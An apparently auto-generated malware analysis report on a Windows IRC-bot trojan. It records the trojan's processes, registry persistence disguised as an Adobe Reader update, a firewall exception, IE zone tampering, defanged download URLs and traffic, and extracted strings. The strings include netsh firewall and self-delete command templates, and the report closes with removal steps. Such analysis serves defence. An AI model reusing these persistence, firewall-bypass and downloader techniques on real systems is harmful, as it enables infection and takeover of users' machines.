Trojan.GenericKD.2501700_eac01b3e3d
Trojan.Win32.IRCbot.wbc (Kaspersky), Trojan.GenericKD.2501700 (B) (Emsisoft), Trojan.GenericKD.2501700 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: eac01b3e3da68a9d6f8a4d5bdba8ff80
SHA1: 4b4e72c1312ed93dbcf5941d38599950afeef16c
SHA256: 2bc8da93aef5da7a450c44db33f36091d7e17d13401a79b40058577acb837f43
SSDeep: 12288:TdomNG5aNscVYomwSGgBJMn4Qp8MIU7TmF8/FNEz1l4RBzDYaLLfXTBxEK xeoM:T9NhNsqYoGGGMJXIVF8DDffXlxEfxO
Size: 875520 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, BorlandDelphi30, BorlandDelphiv30, ACProtect141
Company: no certificate found
Created at: 2014-01-12 03:27:36
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
derp_01240.exe:1676
derp_01240.exe:1540
netsh.exe:1692
acrobatreader.exe:2016
%original file name%.exe:464
%original file name%.exe:1752
The Trojan injects its code into the following process(es):
acrobatreader.exe:500
svchost.exe:1716
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process acrobatreader.exe:500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\derp_01240.exe (81692 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\max[1].exe (81284 bytes)
The process %original file name%.exe:1752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\acrobatreader.exe (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
Registry activity
The process derp_01240.exe:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 76 F5 FD 8B B6 57 E2 51 0A E8 B2 81 71 BA 5B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
To run itself automatically each time Windows boots, the Trojan adds the following link to its file in the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost.exe" = "%Documents and Settings%\%current user%\Application Data\svchost.exe"
The process derp_01240.exe:1540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE EF A9 F6 68 FA 45 2C 4D 3D 9A 20 FC DD FC 5F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process netsh.exe:1692 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 54 92 24 47 1B 0F 3E FE 82 FC 60 88 46 78 8D"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
Adds a rule to the Windows firewall which allows any network activity for the dropped file:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Application Data]
"acrobatreader.exe" = "%Documents and Settings%\%current user%\Application Data\acrobatreader.exe:*:Enabled:Adobe Reader Update"
The process acrobatreader.exe:2016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE 0B 99 36 B8 6D D5 5E 79 3F B6 1E 00 16 B1 27"
The process acrobatreader.exe:500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF E0 A6 26 6C E8 55 49 DF BE 12 90 85 3F B2 D2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security-zone settings so that all local web nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 0E 06 90 DD FF B0 18 B3 24 77 7A 3C 7C 5A 5B"
The process %original file name%.exe:1752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 8E CB A0 29 F2 F6 E9 61 FA F3 0F B4 EC E4 3C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
To run itself automatically each time Windows boots, the Trojan adds the following link to its file in the system registry autorun keys:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader Update" = "%Documents and Settings%\%current user%\Application Data\acrobatreader.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader Update" = "%Documents and Settings%\%current user%\Application Data\acrobatreader.exe"
Dropped PE files
| MD5 | File path |
|---|---|
| 9a5e80109ac5da734e5b8aa29d9ed8df | c:\Documents and Settings\"%CurrentUserName%"\Application Data\svchost.exe |
| 9a5e80109ac5da734e5b8aa29d9ed8df | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\max[1].exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| CODE | 4096 | 562940 | 563200 | 4.52767 | 068d9a376436b015dbd4fdb972e80d7c |
| DATA | 569344 | 30448 | 30720 | 5.21875 | 98d49094de9f7a9dbb31c618f776473f |
| BSS | 602112 | 3317 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .idata | 606208 | 9476 | 9728 | 3.3778 | a65f858bde8d7f88687651b7b6fcdf07 |
| .tls | 618496 | 16 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rdata | 622592 | 24 | 512 | 0.135303 | f2cbff1572620ca433944bdc7cea224b |
| .reloc | 626688 | 41336 | 41472 | 4.58274 | 81c2ada2bffa4a11c3ecdc6ccc64e3e3 |
| .rsrc | 671744 | 228408 | 228864 | 4.31735 | 46e5267f125ef15b5927ed9b90603d08 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://galaxee.eu/max.exe | |
| hxxp://www.galaxee.eu/max.exe | |
| max.wifi-usbw.me | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /max.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: VVV.galaxee.eu
HTTP/1.1 200 OK
Date: Thu, 09 Jul 2015 02:33:40 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Last-Modified: Wed, 08 Jul 2015 18:30:25 GMT
ETag: "14882de-13e00-5512d240"
Accept-Ranges: bytes
Content-Length: 81408
Content-Type: application/x-ms-dos-executable
<<< skipped >>>
The Trojan connects to the servers at the following location(s):
.text
`.rdata
@.data
.rsrc
@.reloc
t1SSSSh
p1icka.stp
%sgoogle_%d%d%d%d%d.exe
%s therad dis.
%s dlin from: %s to: %s.
%sderp_%d%d%d%d%d.exe
%s cant parse.
:Zone.Identifier
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
user32.dll
%s %s * 0 :%s
%s %s
%s %s :%s
%s %s %s
%s %s %s %s
wuzsd.tmp~
del "%s">nul
if exist "%s" goto rep
attrib -s -h -r wuzsd.tmp~&del /A /Q wuzsd.tmp~
ping 0.0.0.0
%s\rmme%i%i%i%i.bat
Software\Microsoft\Windows\CurrentVersion\Run\
Ping Timeout? (%d-%d)%d/%d
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
shlwapi.dll
ShellExecuteA
shell32.dll
mpr.dll
dnsapi.dll
netapi32.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
FtpPutFileA
FtpGetFileA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
RegEnumKeyExA
advapi32.dll
netsh firewall add allowedprogram "%s" "%s" ENABLE
%s dns err bad url <%d>
%s failed upd: error exec f: %s.
%s proc done: "%s", tot run time: %s.
%s created proc: "%s", PID: <%d>
%s faild to create: "%s", error: <%d>
%s cant parse path, err: <%d>
%s f dld: %.1fKB to: %s @ %.1fKB/s.
A%s cant open file f writing: %s.
%s!%s@%s
PRIVMSG
%s no %s th d.
%s %s thread stop. (%d thread(s) stopped.)
operator
GetProcessWindowStation
USER32.dll
OLEAUT32.dll
GetWindowsDirectoryA
GetCPInfo
GetProcessHeap
KERNEL32.dll
RegCloseKey
RegCreateKeyExA
ADVAPI32.dll
%s sup?.
%s wtf?
%s %s runnin already!: <%d>
%s faaaiiiiil %s, xDDDDDD: <%d>
no kick me nigga %s
%s logd in.
remove: rem by: %s!%s@%s.
%s advapidll fail.
%s pstoredll fail.
%s main tread.
%s missing a param yo.
msn, msg sent to %s contacts!.
aim, msg sent to %s contacts!.
zcÁ
192.168.11.129
l: dlin from: hXXp://VVV.galaxee.eu/max.exe to: C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\derp_01240.exe.
%Documents and Settings%\%current user%\Application Data\acrobatreader.exe
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><ms_windowsSettings:dpiAware xmlns:ms_windowsSettings="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings" xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</ms_windowsSettings:dpiAware></windowsSettings></application></assembly>PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
@KERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
acrobatreader.exe_500_rwx_00400000_00062000:
.text
`.rdata
@.data
.rsrc
@.reloc
t1SSSSh
p1icka.stp
%sgoogle_%d%d%d%d%d.exe
%s therad dis.
%s dlin from: %s to: %s.
%sderp_%d%d%d%d%d.exe
%s cant parse.
:Zone.Identifier
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
user32.dll
%s %s * 0 :%s
%s %s
%s %s :%s
%s %s %s
%s %s %s %s
wuzsd.tmp~
del "%s">nul
if exist "%s" goto rep
attrib -s -h -r wuzsd.tmp~&del /A /Q wuzsd.tmp~
ping 0.0.0.0
%s\rmme%i%i%i%i.bat
Software\Microsoft\Windows\CurrentVersion\Run\
Ping Timeout? (%d-%d)%d/%d
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
shlwapi.dll
ShellExecuteA
shell32.dll
mpr.dll
dnsapi.dll
netapi32.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
FtpPutFileA
FtpGetFileA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
RegEnumKeyExA
advapi32.dll
netsh firewall add allowedprogram "%s" "%s" ENABLE
%s dns err bad url <%d>
%s failed upd: error exec f: %s.
%s proc done: "%s", tot run time: %s.
%s created proc: "%s", PID: <%d>
%s faild to create: "%s", error: <%d>
%s cant parse path, err: <%d>
%s f dld: %.1fKB to: %s @ %.1fKB/s.
A%s cant open file f writing: %s.
%s!%s@%s
PRIVMSG
%s no %s th d.
%s %s thread stop. (%d thread(s) stopped.)
operator
GetProcessWindowStation
USER32.dll
OLEAUT32.dll
GetWindowsDirectoryA
GetCPInfo
GetProcessHeap
KERNEL32.dll
RegCloseKey
RegCreateKeyExA
ADVAPI32.dll
%s sup?.
%s wtf?
%s %s runnin already!: <%d>
%s faaaiiiiil %s, xDDDDDD: <%d>
no kick me nigga %s
%s logd in.
remove: rem by: %s!%s@%s.
%s advapidll fail.
%s pstoredll fail.
%s main tread.
%s missing a param yo.
msn, msg sent to %s contacts!.
aim, msg sent to %s contacts!.
zcÁ
192.168.11.129
l: dlin from: hXXp://VVV.galaxee.eu/max.exe to: C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\derp_01240.exe.
%Documents and Settings%\%current user%\Application Data\acrobatreader.exe
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><ms_windowsSettings:dpiAware xmlns:ms_windowsSettings="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings" xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</ms_windowsSettings:dpiAware></windowsSettings></application></assembly>PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
@KERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
svchost.exe_1716:
.text
`.rdata
@.data
.rsrc
@.reloc
.PQRSU
t=SSSh
t"SSh
SSShM
PSSh%
PSSSSSSh
SSSht&@
PSShX`A
4<%u,F
%s %s
JOIN %s %s
%s %s %s
%s %s %d %d :%s
JOIN
^0P#R!T"V;H.JML
H-K/k)F E%U'S!"#
Messaged %d users, Skype version %S
%s %s :{%s}: %s%sX
%s #%s
MSVCRT.dll
ntdll.dll
GetProcessHeap
DisconnectNamedPipe
ConnectNamedPipe
CreateNamedPipeW
KERNEL32.dll
WS2_32.dll
SHLWAPI.dll
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
ole32.dll
PSAPI.DLL
ShellExecuteW
SHELL32.dll
RegCloseKey
RegOpenKeyExW
RegNotifyChangeKeyValue
RegCreateKeyExW
ADVAPI32.dll
OLEAUT32.dll
USER32.dll
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
2 2%2*202
8"8.83898
\\.\pipe\%s-%d
\\.\pipe\%s
%s\%s.exe
Mozilla/5.0 (Compatible)
/c ping 0 & del "%s" > NUL
%s\cmd.exe
???? ???,
???? ???
.jpeg
UDPStatsSentVersion
%d%d%d
%d%d%d%d
%d%d%d%d%d
%d%d%d%d%d%d
\nspC06D.tmp
%s-%d
dnsapi.dll
advapi32.dll
comsupp.dll
shell32.dll
wininet.dll
shlwapi.dll
user32.dll
ws2_32.dll
psapi.dll
Ole32.dll
kernel32.dll
%s.exe
%s\%s
%s\*.exe
Software\Microsoft\Windows\CurrentVersion\Run
%s\explorer.exe
%Documents and Settings%\%current user%\Application Data\svchost.exe
svchost.exe
hXXps://goo.gl/GI1HBO?mx
svchost.exe_1716_rwx_00400000_0002B000:
.text
`.rdata
@.data
.rsrc
@.reloc
.PQRSU
t=SSSh
t"SSh
SSShM
PSSh%
PSSSSSSh
SSSht&@
PSShX`A
4<%u,F
%s %s
JOIN %s %s
%s %s %s
%s %s %d %d :%s
JOIN
^0P#R!T"V;H.JML
H-K/k)F E%U'S!"#
Messaged %d users, Skype version %S
%s %s :{%s}: %s%sX
%s #%s
MSVCRT.dll
ntdll.dll
GetProcessHeap
DisconnectNamedPipe
ConnectNamedPipe
CreateNamedPipeW
KERNEL32.dll
WS2_32.dll
SHLWAPI.dll
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
ole32.dll
PSAPI.DLL
ShellExecuteW
SHELL32.dll
RegCloseKey
RegOpenKeyExW
RegNotifyChangeKeyValue
RegCreateKeyExW
ADVAPI32.dll
OLEAUT32.dll
USER32.dll
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
2 2%2*202
8"8.83898
\\.\pipe\%s-%d
\\.\pipe\%s
%s\%s.exe
Mozilla/5.0 (Compatible)
/c ping 0 & del "%s" > NUL
%s\cmd.exe
???? ???,
???? ???
.jpeg
UDPStatsSentVersion
%d%d%d
%d%d%d%d
%d%d%d%d%d
%d%d%d%d%d%d
\nspC06D.tmp
%s-%d
dnsapi.dll
advapi32.dll
comsupp.dll
shell32.dll
wininet.dll
shlwapi.dll
user32.dll
ws2_32.dll
psapi.dll
Ole32.dll
kernel32.dll
%s.exe
%s\%s
%s\*.exe
Software\Microsoft\Windows\CurrentVersion\Run
%s\explorer.exe
%Documents and Settings%\%current user%\Application Data\svchost.exe
svchost.exe
hXXps://goo.gl/GI1HBO?mx
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
derp_01240.exe:1676
derp_01240.exe:1540
netsh.exe:1692
acrobatreader.exe:2016
%original file name%.exe:464
%original file name%.exe:1752
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\derp_01240.exe (81692 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\max[1].exe (81284 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\acrobatreader.exe (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost.exe" = "%Documents and Settings%\%current user%\Application Data\svchost.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader Update" = "%Documents and Settings%\%current user%\Application Data\acrobatreader.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader Update" = "%Documents and Settings%\%current user%\Application Data\acrobatreader.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.